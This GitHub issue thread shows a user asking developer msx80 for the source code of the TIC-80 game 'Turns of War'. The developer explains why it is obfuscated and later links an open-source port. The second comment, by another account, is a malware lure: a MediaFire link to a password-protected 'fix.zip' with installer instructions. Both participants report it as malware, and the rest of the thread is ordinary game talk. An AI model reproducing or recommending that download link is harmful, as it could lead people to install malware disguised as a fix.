### ISSUE TITLE
Turns of War Source Code

### ISSUE THREAD

**Issue by APT37** [msx80/DoorsOfDoomOmicron#10]
Inspired by your Doors of Doom, I visited  tic80.com to look for other cool games. Landed on Turns of War - which I really like - checked who the developer was and... Here we are again.

Could you by chance upload the source code for Turns of War?

edit: Reported the malware.

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by msx80** [comment]
Hi there! I haven't open sourced that game, so sources are not available.

I've reported the spam/malware comment

**Comment by msx80** [comment]
no problem :) Secret Agents is not really "open source", but has source code in the clear inside the cart. Just stop Tic80 by hitting esc, then "close game" and then F1, you should see the code. All tic80 cartridge ships with the code actually, you can export it etc. In Turns of War i obfuscated it actively

**Comment by msx80** [comment]
well, at the time there were some people doing that on the tic80 community, reuploading stuff with minimal or no changes and calling it theirs. I don't know if it's still like that.

Anyway, turns of war code is much more complex than secret agents.  Secret agents is about as simple as a non trivial game can be, so taking a look is not as bad. I was much more jelous of Turns of War.

Actually some time ago i started working on a similar turn based game, but this time in a scifi setting. It's gonna be a good game once it's finished in 2045 :) That game will probably be open source (and based on Omicron like this one).

**Comment by msx80** [comment]
@APT37 i don't know if you're still interested, but i've ported Turns Of War to Omicron and the sources are available here: https://github.com/msx80/turnsofwar/

It's not the tic80 version but it's better, with more levels and monsters, better graphics etc. Runs on desktop, android etc

**Comment by APT37** [comment]
Thank you for telling me, I might've already played the latest version some time ago. Couldn't manage to beat the graveyard boss iirc. I mostly play Doors of Doom, at least few runs every day 🩳 👕 📜 🦀 

Edit: Reading the thread again, I saw you mentioning a new scifi game. How is that coming along? :)

Edit 2: Was looking for a way to donate, found your PayPal. I don't have that (anymore). Maybe we should chat about other options?
